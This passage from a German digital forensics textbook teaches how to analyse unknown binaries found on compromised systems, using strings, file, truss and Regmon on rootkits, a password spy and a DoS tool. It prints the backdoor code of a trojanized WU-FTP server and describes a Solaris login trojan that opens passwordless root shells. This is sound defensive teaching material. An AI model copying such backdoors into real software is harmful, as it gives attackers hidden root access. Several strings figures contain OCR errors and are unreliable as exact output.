mittlung zu eigen machen. Oft lassen sich diese einzelnen Fragmente zu einer Datei zusammensetzen oder sich zumindest wesentliche Informationen extrahieren. Es gibt verschiedene kommerzielle wie auch frei verfügbare Tools, mit denen aus bereits gelöschten Dateien Fragmente extrahiert werden können. Diese Option gibt es auch unter einigen Unix-Dateisystemen. Speziell für die digitale Forensik finden sich darüber hinaus anwendbare Programme und Toolsammlungen.

So können zum Beispiel aus dem unallozierten Bereich eines Dateisystems Daten automatisiert wiederhergestellt werden. Ebenso lassen sich Daten in Alternate Data Streams und auch File Slacks ohne Problem wiederherstellen. Dies bietet etwa Erkenntnisse über vom Angreifer gelöschte Originaldateien oder Archive, die ursprünglich Rootkits oder andere Angriffstools enthalten haben. Werden zum Beispiel auf dem angegriffenen System Programme kompiliert, finden sich im Temp-Bereich oft gelöschte Reste vom Compiler-Lauf, die dann wiederum Aufschlüsse über das verwendete Tool oder dessen Quellcode geben könnten. Bei der Wiederherstellung von Fragmenten aus unallozierten Dateisystembereichen können größere Mengen an Daten anfallen, die sorgfältig behandelt werden sollten.

Dabei ist besonders zu beachten, dass die Wiederherstellung unbedingt an einem forensischen Duplikat vorgenommen werden sollte. Kann man nur an einem laufenden System arbeiten, sollten die wiederhergestellten Daten dann auf einem separaten Dateisystem gespeichert werden, da sonst ja der unallozierte Bereich (den man eigentlich extrahieren will) wieder überschrieben wird. Dies muss unbedingt verhindert werden. Alternativ kann dafür auch eine RAM-Disk eingerichtet werden.

Ein Angreifer hat natürlich die Möglichkeit, die Extraktion von vermeintlich gelöschten Dateien zu verhindern. Eine wirksame Möglichkeit ist das mehrfache Überschreiben der zu löschenden Informationen mit echten zufälligen Bit-Mustern oder auch Nullen. Dies findet sich oft auf Systemen, bei denen der Benutzer verhindern wollte, dass irgendwelche Daten wiederhergestellt werden können. Auf normalen gehackten Servern ist dieses »umsichtige« Täterverhalten selten zu beobachten.

## 5.7 Unbekannte Binär-Dateien analysieren

Werden auf einem angegriffenen System Binärdateien gefunden, die z. B. aus unbekannten Rootkits stammen oder sonstige Angriffs- bzw. Sabotagewerkzeuge darstellen, ist es mitunter von Interesse, diese DaWiederherstellung nur am Duplikat

Extraktion verhindern

teien näher zu untersuchen. Dies kann Erkenntnisse über den Täter oder aber auch über dessen Absichten bringen.

*Vielleicht doch eine Originaldatei?* Als erstes ist zu klären, ob es sich bei der gefundenen Datei nicht etwa doch um eine originale Systemdatei handeln könnte. Dazu sollte die Prüfsumme der gefundenen Datei mit den Prüfsummen einer Originaldatei (selbstverständlich aus vertrauenswürdiger Quelle) verglichen werden. Für SUN Solaris, \*BSD und einige Linux-Distributionen gibt es auch diverse Online-Projekte, wo MD5-Prüfsummen von Systemdateien unterschiedlicher Versionen recherchierbar sind<sup>3</sup>. Einige kommerzielle Forensiktools enthalten ebenfalls MD5- oder SHA-Prüfsummen bekannter Anwendungs- und Systemdateien.

> Da die Analyse an einer Kopie der verdächtigen Datei und auf einem Analysesystem vorgenommen wird, können im Verlauf auch etwas robustere Analysemethoden zum Einsatz kommen. Bevor man aber vollends Klarheit über die verdächtige Datei hat, sollten die im Folgenden beschriebenen Analysen nur in einer isolierten Testumgebung durchgeführt werden.

Prüfsummen vergleichen Als Erstes muss man sich vergewissern, dass die Datei während des Kopier- bzw. Übertragungsvorgangs nicht modifiziert wurde. Dies wird am besten durch den Vergleich der Prüfsummen erreicht.

\$ md5sum wmo32.exe
39a9e5c05ffbda925da0d2ec9b4f512a \*wmo32.exe

Dateityp ermitteln Mit Hilfe des Befehls *file* kann man ermitteln, um welchen Dateityp es sich hierbei handelt. Dies geschieht durch die Auswertung der so genannten Magic-ID.

In den folgenden drei Beispielen handelt es sich zuerst um eine ausführbare Datei für DOS und Windows:

\$ file wmo32.exe
wmo32.exe: MS-DOS executable (EXE), OS/2 or MS Windows

Hier ein Beispiel für eine Linux-Datei:

\$ file .fileMFpmnk
.fileMFpmnk: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for
GNU/Linux 2.2.5, dynamically linked (uses shared libs), stripped

Und ein Beispiel für eine Solaris-Datei:

\$file sun1
sun1: ELF 32-bit MSB executable, SPARC, version 1, statically linked, stripped

http://www.knowngoods.org/, http://sunsolve.sun.com/pub-cgi/fileFingerprints.pl

Durch eine String-Analyse der verdächtigen Datei wird nach weiteren Hinweisen gesucht. Hierbei werden alle »lesbaren« ASCII-Zeichen aus der Binärdatei extrahiert, um eventuell Verdächtiges zu erkennen.

Der Inhalt der Datei im folgenden Beispiel sollte jeden Ermittler aufhorchen lassen. Hierbei handelt es sich ganz klar um ein Windows-Rootkit (konkret das NT-RootKit):

| <pre>\$ strings /forensic_mnt/c/WINNT/hxdef073.exe   more</pre> |
|-----------------------------------------------------------------|
| This program must be run under Win32                            |
| SOFTWARE\Borland\Delphi\RTL                                     |
| FPUMaskValue                                                    |
| @h W@                                                           |
| <pre>\\.\mailslot\hxdef-rk073s</pre>                            |
| NtQuerySystemInformation                                        |
| ntdll.dll                                                       |
| =[Hacker Defender]=                                             |
| kernel32.dll                                                    |
| []                                                              |
| NtOuervInformationProcess                                       |
| NtOnenKev                                                       |
| RtlAnsiStringTollnicodeString                                   |
| Rt1ComparellnicodeString                                        |
| \BaseNamedObjects                                               |
| \\ \mailslot\hxdef_rk073s                                       |
| \\.\mailslot\hxdef-rkc000                                       |
| <pre>\\.\mailslot\hxdef-rkb000</pre>                            |
| -=[Hacker Defender]=-                                           |
| [Hacker Defender]                                               |
|                                                                 |
|                                                                 |
| [HIDDEN SERVICES]                                               |
| [HIDDEN BECKEYS]                                                |
| [HIDDEN REGVALUES]                                              |
|                                                                 |
|                                                                 |
|                                                                 |
|                                                                 |
|                                                                 |
|                                                                 |
| 7774                                                            |
|                                                                 |
|                                                                 |
| D\$ D                                                           |
| D\$ / P                                                         |
|                                                                 |
| Sarvica                                                         |
| SVSTEM\CurrentControlSet\Control\SafeBoot\                      |
| Minimal                                                         |
| Natuonk                                                         |
|                                                                 |
| JVII:<br>Jahrani 22 dili                                        |
| auvapisz.uli                                                    |

Abb. 5-7 String-Analyse einer verdächtigen Windows-Datei

String-Analyse

Im folgenden Beispiel ist anhand der String-Analyse zu erkennen, dass es sich um ein Programm handeln muss, dass auf RAS-Telefonbucheinträge zugreift (in diesem Fall werden zwischengespeicherte DFÜ-Passwörter im Klartext ausgelesen):

| <pre>\$ strings dllserver32.exe  more</pre> |
|---------------------------------------------|
| This program must be run under Win32        |
| []                                          |
| rasapi32.dll                                |
| RasGetEntryPropertiesA                      |
| rnaph.dll                                   |
| RasSetEntryPropertiesA                      |
| PWSj                                        |
| Connection:                                 |
| User:"                                      |
| " Password:                                 |
| unknown                                     |
| Domain:                                     |
| Phone:                                      |
| Device: (                                   |
| IP:                                         |
| DNS:                                        |
| END CONNECTION                              |
| FreeLibrary                                 |
| rasapi32.dll                                |
| RasGetEntryDialParamsA                      |
| RasEnumEntriesA                             |
| []                                          |

Abb. 5-8 String-Analyse bei einem Windows RAS-Passwort-Spion

| Laufzeitanalyse unter Unix | Befindet man sich in einer sicheren, isolierten Testumgebung, kann                 |
|----------------------------|------------------------------------------------------------------------------------|
|                            | man die verdächtige Datei auch zur Laufzeit analysieren. Hier stehen               |
|                            | die Unix-Befehle strace und truss zur Verfügung, die protokollieren,               |
|                            | auf welche Ressourcen ein Programm zugreift.                                       |
| Beispiel mit truss         | Das hier genannte Beispiel mit truss zeigt, dass das vermeintliche                 |
|                            | Systemprogramm netstat auf die Datei /dev/ptyr zugreifen möchte:                   |
|                            | <pre>\$ truss -t open /forensic_mnt/usr/bin/netstat</pre>                          |
|                            | open("/dev/zero", 0_RDONLY) = 3                                                    |
|                            | open("/usr/lib/libc.so.1", O_RDONLY) = 4                                           |
|                            | open("/usr/lib/libdl.so.1", O_RDONLY) = 4                                          |
|                            | open("/usr/platform/SUNW,Sun_4_75/lib/libc_psr.so.1", 0_RDONLY)    Err#2    ENOENT |
|                            | open("/dev/ptyr", 0_RDONLY) Err#2 ENOENT                                           |
|                            | open(".", 0_RDONLY 0_NDELAY) = 3                                                   |
|                            | []                                                                                 |
|                            |                                                                                    |

Kapitel 5.4 war zu entnehmen, dass im Verzeichnis /dev keine Dateien zu finden sein sollten und die spezielle Datei /dev/ptyr für das Verber-

gen von bestimmten IP-Adressen und Ports durch das Linux Rootkit LRK verwendet wird. Hat ein Angreifer seine Tools nicht angepasst und verwendet die Standardeinstellungen, ist das Auffinden solcher Trojaner bei der Post-Mortem-Analyse recht einfach.

Auf einem Windows-System ist eine Laufzeitanalyse ebenfalls möglich. Beispielsweise können Tools wie FileMon, PortMon oder RegMon (Abb. 5-9) dazu verwendet werden:

Laufzeitanalyse unter Windows

| 🎊 R  | egistry Monil | tor - Sysinternals: www. | sysinternals. | com                                                                |               | _ [[       | 74i : |
|------|---------------|--------------------------|---------------|--------------------------------------------------------------------|---------------|------------|-------|
| File | Edit Options  | : Help                   |               |                                                                    |               |            |       |
|      | 🕺 🕅           | 🖾 🖉 🗎 🖉 🖾 🗎              | М 💣           |                                                                    |               |            |       |
| #    | Time          | Process                  | Request       | Path                                                               | Result        | Other      |       |
| 5529 | 54,13940403   | 3 🗂 wmo32.exe:1532       | QuervValue    | HKCU\Software\Microsoft\BAS Phonebook\AlternatePhonebookPath       | SUCCESS       |            |       |
| 5530 | 54.14016167   | wmo32.exe:1532           | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\AlternatePhonebookPath       | SUCCESS       | 100        |       |
| 5531 | 54.14019463   | 3 🛅 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\DefaultEntry                 | SUCCESS       |            |       |
| 5532 | 54.1402253E   | 6 🔲 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\DefaultEntry                 | SUCCESS       |            |       |
| 5533 | 54.14026783   | 3 🛄 wmo32.exe:1532       | CloseKey      | HKCU\Software\Microsoft\RAS Phonebook                              | SUCCESS       | Key: 0xE28 |       |
| 5534 | 54.14357160   | ) 🛄 wmo32.exe:1532       | OpenKey       | HKLM\SYSTEM\CurrentControlSet\Services\Tcpip                       | SUCCESS       | Key: 0xE28 |       |
| 5535 | 54.14362608   | 3 🛅 wmo32.exe:1532       | CloseKey      | HKLM\SYSTEM\CurrentControlSet\Services\Tcpip                       | SUCCESS       | Key: 0xE28 |       |
| 5536 | 54.14367245   | 5 🛅 wmo32.exe:1532       | OpenKey       | HKLM\SYSTEM\CurrentControlSet\Services\NwlnkIpx                    | NOTFOUND      |            |       |
| 5537 | 54.14371352   | 2 wmo32.exe:1532         | OpenKey       | HKLM\SYSTEM\CurrentControlSet\Services\Nbf                         | NOTFOUND      |            | _     |
| 5624 | 54.20928777   | 7 🗂 wmo32.exe:1532       | OpenKey       | HKCU\Software\Microsoft\Windows NT\CurrentVersion\Network\RemoteAc | cess NOTFOUND |            |       |
| 5625 | 54.20937940   | ) 🛅 wmo32.exe:1532       | OpenKey       | HKCU\Software\Microsoft\RAS Phonebook                              | SUCCESS       | Key: 0xE28 |       |
| 5626 | 54.20944198   | 3 🗂 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\PhonebookMode                | SUCCESS       | 0x0        |       |
| 5627 | 54.20947076   | 6 🛅 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\OperatorDial                 | SUCCESS       | 0x0        |       |
| 5628 | 54.20949730   | ) 🛅 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\PreviewPhoneNumber           | SUCCESS       | 0x1        |       |
| 5629 | 54.20952244   | 🛛 📰 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\UseLocation                  | SUCCESS       | 0x1        |       |
| 5630 | 54.20954786   | 6 🛄 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\ShowLights                   | SUCCESS       | 0x1        |       |
| 5631 | 54.20957440   | ) 📰 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\ShowConnectStatus            | SUCCESS       | 0x1        |       |
| 5632 | 54.20960094   | 🛛 🛄 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\NewEntryWizard               | SUCCESS       | 0x1        |       |
| 5633 | 54.21068180   | ) 🛄 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\CloseOnDial                  | SUCCESS       | 0x1        |       |
| 5634 | 54.21071952   | 2 🛄 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\AllowLogonPhonebookEdits     | SUCCESS       | 0x0        |       |
| 5635 | 54.21074885   | 5 🛄 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\AllowLogonLocationEdits      | SUCCESS       | 0x1        |       |
| 5636 | 54.21077707   | 7 🛄 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\SkipConnectComplete          | SUCCESS       | 0x1        |       |
| 5637 | 54.21080445   | 5 🛄 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\RedialAttempts               | SUCCESS       | 0x0        |       |
| 5638 | 54.21083182   | 2 🛄 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\RedialSeconds                | SUCCESS       | 0xF        |       |
| 5640 | 54.21236749   | ) 🛄 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\IdleHangUpSeconds            | SUCCESS       | 0x4B0      |       |
| 5641 | 54.21347574   | 🖾 wmo32.exe:1532         | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\RedialOnLinkFailure          | SUCCESS       | 0x0        |       |
| 5642 | 54.21350786   | 6 🛄 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\PopupOnTopWhenRedialing      | SUCCESS       | 0x1        |       |
| 5643 | 54.21353692   | 2 🛄 wmo32.exe:1532       | QueryValue    | HKCU\Software\Microsoft\RAS Phonebook\ExpandAutoDialQuery          | SUCCESS       | 0x0        | -     |

**Abb. 5-9** Analyse der Registry-Zugriffe einer verdächtigen Datei mit Regmon<sup>4</sup> (nähere Informationen zu diesem Tool in Kapitel 7.2.6)

Bei diesem Beispiel wurde im /tmp-Verzeichnis eines gehackten Systems eine versteckte Datei gefunden, die dem User Root gehört und für diesen ausführbar ist:

```
$ ls -lat /forensic mnt/tmp
total 156
drwxrwxrwt
                                   1024 May 1 04:03 .
            6 root
                       root
-r--r--
            1 root
                       gdm
                                     11 Apr 29 14:17 .X0-lock
drwxrwxrwt
           2 root
                       gdm
                                   1024 Apr 29 14:17 .X11-unix
                                   1024 Apr 29 14:17 .font-unix
drwxrwxrwt
           2 xfs
                       xfs
drwxr-xr-x 25 y
                                   1024 Apr 28 23:47 ..
                       root
                                   1024 Apr 26 17:36 kfm-cache-500
drwx----- 2 user1
                       user1
-rw-rw-r-- 1 user1
                                  12288 Apr 26 16:37 psdevtab
                       user1
                                   1024 Apr 21 11:12 .ICE-unix
drwxrwxrwt 2 root
                       root
                                 138520 Apr 20 20:15 .fileMFpmnk
-rwx----- 1 root
                       root
```

4. http://www.sysinternals.com/

Da dies eher unüblich ist, wird die Datei noch näher untersucht. Nach einer String-Analyse stellt sie sich als eine Version des bekannten WU-FTP-Servers für Linux heraus:

\$ file /forensic\_mnt/tmp/.fileMFpmnk
.fileMFpmnk: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for
GNU/Linux 2.2.5, dynamically linked (uses shared libs), not stripped

```
$ strings - /forensic_mnt/tmp/.fileMFpmnk
[...]
 If you did not receive a copy of the license, it may be obtained online
 at http://www.wu-ftpd.org/license.html.
[...]
%s FTP server (%s) ready.
%s FTP server ready.
[...]
lost connection to %s
deny
private
Already logged in.
anonymous
anonymous
/etc/ftpusers
guestserver
/bin/sh
Password required for %s.
/bin/sh -i
/etc/ftphosts
deny-uid
allow-uid
deny-gid
allow-gid
Login with USER first.
guest-root
 Access restrictions apply.
User %s logged in.%s
limit-time
guest
FTP LOGIN FROM %s, %s
%s: anonymous/%.*s
       for example: %s@%s
Can't set uid.
```

Die String-Analyse zeigt aber auch, dass zusätzlich zum normalen anonymous-Account ein weiterer Account vorgesehen ist. In der Nähe dieses Accounts anonymous\_ findet sich der Eintrag /bin/sh -i. Dies lässt vermuten, dass bei der Anmeldung als User anonymous\_ eine passwortlose Root-Shell geöffnet wird. Mithilfe einer Web-Recherche nach trojanisierten WU-FTP-Servern fand sich eine Version, deren Quellcode diese Vermutung bestätigt:

```
#endif
anonymous = 0;
acl_remove();
if (!strcasecmp(name,"anonymous_")) {
  system("/bin/sh -i");
}
```

Abb. 5-10 Quellcode des trojanisierten WU-FTP Servers

Eine weitere Möglichkeit, mehr über die mögliche Funktion einer verdächtigen Datei herauszufinden, ist die Analyse der dynamisch eingebundenen Bibliotheken. Kennt man die Funktion dieser Bibliotheken, lassen sich häufig Grundfunktionen (Netzzugriffe, Authentisierung etc.) der verdächtigen Datei nachvollziehen:

# ldd /mnt/tmp/.fileMFpmnk
 libcrypt.so.1 => /lib/libcrypt.so.1 (0x40024000)
 libnsl.so.1 => /lib/libnsl.so.1 (0x40051000)
 libresolv.so.2 => /lib/libresolv.so.2 (0x40066000)
 libc.so.6 => /lib/libc.so.6 (0x4200000)
 /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x4000000)

Manchmal finden sich auch Hinweise auf den Programmierer in zurückgelassenen Tools. Eine String-Analyse einer verdächtigen Datei namens »unamed«, die auf einem gehackten Linux-System gefunden wurde, entpuppt sich nach einer kurzen Suchmaschinenrecherche z. B. als das Denial-of-Service-Angriffstool Juno: dynamisch eingebundene Bibliotheken analysieren

zurückgelassene Hacker-Tools

| <pre># strings /foensic_mnt/usr/bin/unamed  more<br/>/lib/ld-linux.so.2<br/>libc.so.6<br/>usleep<br/>socket<br/>bzero<br/>fprintf<br/>inet_addr<br/>setsockopt<br/>signal<br/>sendto<br/>ntohs<br/>inet_ntoa<br/>time<br/>gethostbyname<br/>stderr<br/>srandom<br/>htons<br/>exit</pre> |
|----------------------------------------------------------------------------------------------------|
| atoi                                                                                                    |
| IO stdin used                                                                                                    |
| libc start main                                                                                                    |
| gmon start                                                                                                    |
| <u></u>                                                                                                    |
| DTDh                                                                                                    |
| 0Vb2                                                                                                    |
| QVII:                                                                                                    |
| Statistics <sup>ed</sup>                                                                                                    |
| packets sellt: <sup>%</sup> u                                                                                                    |
| bytes selit: <sup>%</sup> u                                                                                                    |
| seconds active: «u                                                                                                    |
| average bytes/second: %u                                                                                                    |
| Suntax, &c                                                                                                    |
| syntax. 0s                                                                                                    |
| Failed to create socket                                                                                                    |
| Invalid target in $(8c)$                                                                                                    |
| Invalid target opt (%s)                                                                                                    |
| death                                                                                                    |
| ses s                                                                                                    |
| 10.%s•%d                                                                                                    |
| failed to send packet                                                                                                    |
| jung c by Sorcerer of DALnet                                                                                                    |
| Janote Sy concerci of Maliet                                                                                                    |

Abb. 5-11 String-Analyse einer unbekannten Binär-Datei

## Ein Beispiel für eine umfangreiche Analyse

Ein weiteres Beispiel – diesmal aus dem realen Leben und durchgeführt vom Honeynet-Project<sup>5</sup> – zeigt, dass die Analyse durchaus recht komplexe Ergebnisse zu Tage bringen kann:

Der Unix-Befehl *file* zeigt, dass es sich bei einer aus dem Datenstrom einer Netzverbindung gefischten Datei (in dem Beispiel in sun1 umbenannte) um eine ausführbare Datei für Solaris handelt:

```
$file sun1
sun1: ELF 32-bit MSB executable, SPARC, version 1, statically linked, stripped
```

Die darauf folgende String-Analyse stellt einige Zeichen dar, die einer weiteren Nachforschung bedürfen:

#strings sun1
[...]
DISPLAY
/usr/lib/libfl.k
pirc
/bin/sh
[...]

Die Spezialisten des Honeynet-Project vermuteten, dass zwischen den Zeichen DISPLAY und /bin/sh ein Zusammenhang vorhanden sei. Es wurde weiterhin angenommen, dass es sich um einen trojanisierten Ersatz für das Systemprogramm /bin/login handele; dieses würde Angreifern, die eine bestimmte Display-Variable gesetzt hätten, einen passwortlosen Root-Zugang ermöglichen. Die originale /bin/login-Datei wurde nach /usr/lib/libfl.k kopiert und wickelt im Anschluss den weiteren normalen Login-Prozess ab. Als Wert für die besonders zu setzende Display-Variable wurde »pirc« vermutet, da der Wert in der Nähe des String DISPLAY in der Datei auftaucht.

Als Nächstes überwachten die Ermittler auf einer Solaris-Umgebung mit dem Analysetool *truss* erneut sämtliche Ressourcenzugriffe der verdächtigen Datei:

```
$ truss ./sun1
execve("./sun1", 0xFFBEFC8C, 0xFFBEFC94) argc = 1
execve("/usr/lib/libfl.k", 0xFFBEFC8C, 0xFFBEFC94) Err#2 ENOENT
_exit(1)
```

<sup>5.</sup> http://project.honeynet.org/

Es sah so aus, als wäre dies das Verhalten der verdächtigen Datei, wenn ein normaler User ohne gesetzte Display-Variable auf das System zugriff. Es ist gut zu erkennen, wie dann die originale – umkopierte – Login-Datei (/usr/lib/libfl.k) aufgerufen wurde.

Der oben beschriebenen Vermutung folgend, wurde nun die Display-Variable durch die Ermittler auf den Wert »pirc« gesetzt und die verdächtige Datei abermals mit *truss* analysiert:

```
# export DISPLAY=pirc
# truss ./sun1
```

```
execve("./sun1", 0xFFBEFCA4, 0xFFBEFCAC) argc
                                                 = 1
sigfillset(0x0002A5E4)
                                                 = 0
sigprocmask(SIG_BLOCK, 0xFFBEFB0C, 0xFFBEFAFC)
                                                 = 0
sigaction(SIGCLD, 0xFFBEF9C8, 0xFFBEFABC)
                                                 = 0
vfork()
                                                 = 6558
sigaction(SIGINT, 0xFFBEF9C8, 0xFFBEFA78)
                                                 = 0
sigaction(SIGQUIT, 0xFFBEF9C8, 0xFFBEFA58)
                                                 = 0
#
waitid(P PID, 6558, 0xFFBEF968, 0403
                                       ) (sleeping...)
# exit
waitid(P PID, 20903, 0xFFBEF968, 0403
                                                 = 0
                                        )
sigaction(SIGINT, 0xFFBEF9C8, 0x0000000)
                                                 = 0
                                                 = 0
sigaction(SIGQUIT, 0xFFBEF9C8, 0x0000000)
                                                 = 0
sigaction(SIGCLD, 0xFFBEF9C8, 0x0000000)
sigprocmask(SIG SETMASK, 0xFFBEFAFC, 0x0000000) = 0
exit(1)
```

Abb. 5-12 Nach Setzen der »speziellen« Display-Variable ist Root-Zugang möglich.

Anhand des Root-Prompts »#« in Abb. 5-12 ist zu erkennen, dass beim Setzen der »magischen« Display-Variable »pirc« eine passwortlose Root-Shell geöffnet wird.

Fazit

Unbekannte Binärdateien zu analysieren – dies zeigte das Honeynet-Beispiel deutlich – kann zu einer sehr komplexen Angelegenheit werden. Wenn man mit den Methoden von Angreifern, deren Vorgehen und Werkzeugen vertraut ist, kann man aber unter Unständen interessante Informationen erlangen.

## 5.8 Systemprotokolle

Protokolldateien können oft von Angriffen oder von verdächtigen Anzeichen vor einem Angriff zeugen. Wenn sich ein Angreifer z. B. nicht die Mühe macht, die Logfiles zu säubern, können sie zumindest als An-